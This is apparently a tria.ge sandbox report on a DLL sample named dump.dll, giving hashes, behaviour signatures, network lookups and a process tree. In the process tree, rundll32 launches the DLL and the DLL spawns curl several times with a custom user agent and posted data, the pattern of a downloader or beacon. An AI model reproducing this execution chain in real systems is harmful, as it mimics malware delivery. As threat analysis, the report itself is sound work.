Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

1

Static

static

1

dump.dll

windows7-x64

1

dump.dll

windows10-2004-x64

1

Analysis

  • max time kernel
    141s
  • max time network
    108s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/03/2023, 14:11 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    dump.dll

  • Size

    178KB

  • MD5

    529c65521e8a07c8810b6d225f7e2a89

  • SHA1

    d03ee28dc71232ba9895dd5f017ecfbd18a621ce

  • SHA256

    ba186a1a97d4f647dad39cb3ccae5466bb8d5463ceedf470428484416265ef5f

  • SHA512

    15185e2b075c6dddc73441081405cfbd4c009ef229d037c5cf06792d5d1d8d802546aba0ce81345ed349d3b8a86393b1488420f364661de62b536aa56e68c74c

  • SSDEEP

    3072:7Qb8KGhaCX8bYS3oAlob7UgS0VRilFxfiHNSXMJiB5CnPBRalGsQjxncIpoa1cT9:fQp4lBZFoaZLU9o0GVmA+P

Score
1/10

Malware Config

Signatures

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\dump.dll,#1
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:232
    • C:\Windows\system32\curl.exe
      curl -A cur1-agent -L -s -d dl
      2⤵
        PID:208
      • C:\Windows\system32\curl.exe
        curl -A cur1-agent -L -s -d dl
        2⤵
          PID:2548
        • C:\Windows\system32\curl.exe
          curl -A cur1-agent -L -s -d dl
          2⤵
            PID:852
          • C:\Windows\system32\curl.exe
            curl -A cur1-agent -L -s -d dl
            2⤵
              PID:3764
            • C:\Windows\system32\curl.exe
              curl -A cur1-agent -L -s -d dl
              2⤵
                PID:1052

            Network

            • flag-us
              DNS
              228.249.119.40.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              228.249.119.40.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              95.221.229.192.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              95.221.229.192.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              154.25.221.88.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              154.25.221.88.in-addr.arpa
              IN PTR
              Response
              154.25.221.88.in-addr.arpa
              IN PTR
              a88-221-25-154deploystaticakamaitechnologiescom
            • flag-us
              DNS
              36.146.190.20.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              36.146.190.20.in-addr.arpa
              IN PTR
              Response
              36.146.190.20.in-addr.arpa
              IN CNAME
              36.0-26.146.190.20.in-addr.arpa
            • flag-us
              DNS
              123.108.74.40.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              123.108.74.40.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              164.2.77.40.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              164.2.77.40.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              233.141.123.20.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              233.141.123.20.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              2.36.159.162.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              2.36.159.162.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              176.122.125.40.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              176.122.125.40.in-addr.arpa
              IN PTR
              Response
            • flag-us
              DNS
              216.74.101.95.in-addr.arpa
              Remote address:
              8.8.8.8:53
              Request
              216.74.101.95.in-addr.arpa
              IN PTR
              Response
              216.74.101.95.in-addr.arpa
              IN PTR
              a95-101-74-216deploystaticakamaitechnologiescom
            • 13.69.239.74:443
              322 B
               7
            • 93.184.221.240:80
              322 B
               7
            • 93.184.221.240:80
              322 B
               7
            • 173.223.113.164:443
              322 B
               7
            • 131.253.33.203:80
              322 B
               7
            • 8.8.8.8:53
              228.249.119.40.in-addr.arpa
              dns
              73 B
               159 B
               1
              1

              DNS Request

              228.249.119.40.in-addr.arpa

            • 8.8.8.8:53
              95.221.229.192.in-addr.arpa
              dns
              73 B
               144 B
               1
              1

              DNS Request

              95.221.229.192.in-addr.arpa

            • 8.8.8.8:53
              154.25.221.88.in-addr.arpa
              dns
              72 B
               137 B
               1
              1

              DNS Request

              154.25.221.88.in-addr.arpa

            • 8.8.8.8:53
              36.146.190.20.in-addr.arpa
              dns
              72 B
               168 B
               1
              1

              DNS Request

              36.146.190.20.in-addr.arpa

            • 8.8.8.8:53
              123.108.74.40.in-addr.arpa
              dns
              72 B
               146 B
               1
              1

              DNS Request

              123.108.74.40.in-addr.arpa

            • 8.8.8.8:53
              164.2.77.40.in-addr.arpa
              dns
              70 B
               144 B
               1
              1

              DNS Request

              164.2.77.40.in-addr.arpa

            • 8.8.8.8:53
              233.141.123.20.in-addr.arpa
              dns
              73 B
               159 B
               1
              1

              DNS Request

              233.141.123.20.in-addr.arpa

            • 8.8.8.8:53
              2.36.159.162.in-addr.arpa
              dns
              71 B
               133 B
               1
              1

              DNS Request

              2.36.159.162.in-addr.arpa

            • 8.8.8.8:53
              176.122.125.40.in-addr.arpa
              dns
              73 B
               159 B
               1
              1

              DNS Request

              176.122.125.40.in-addr.arpa

            • 8.8.8.8:53
              216.74.101.95.in-addr.arpa
              dns
              72 B
               137 B
               1
              1

              DNS Request

              216.74.101.95.in-addr.arpa

            MITRE ATT&CK Matrix

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            We care about your privacy.

            This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.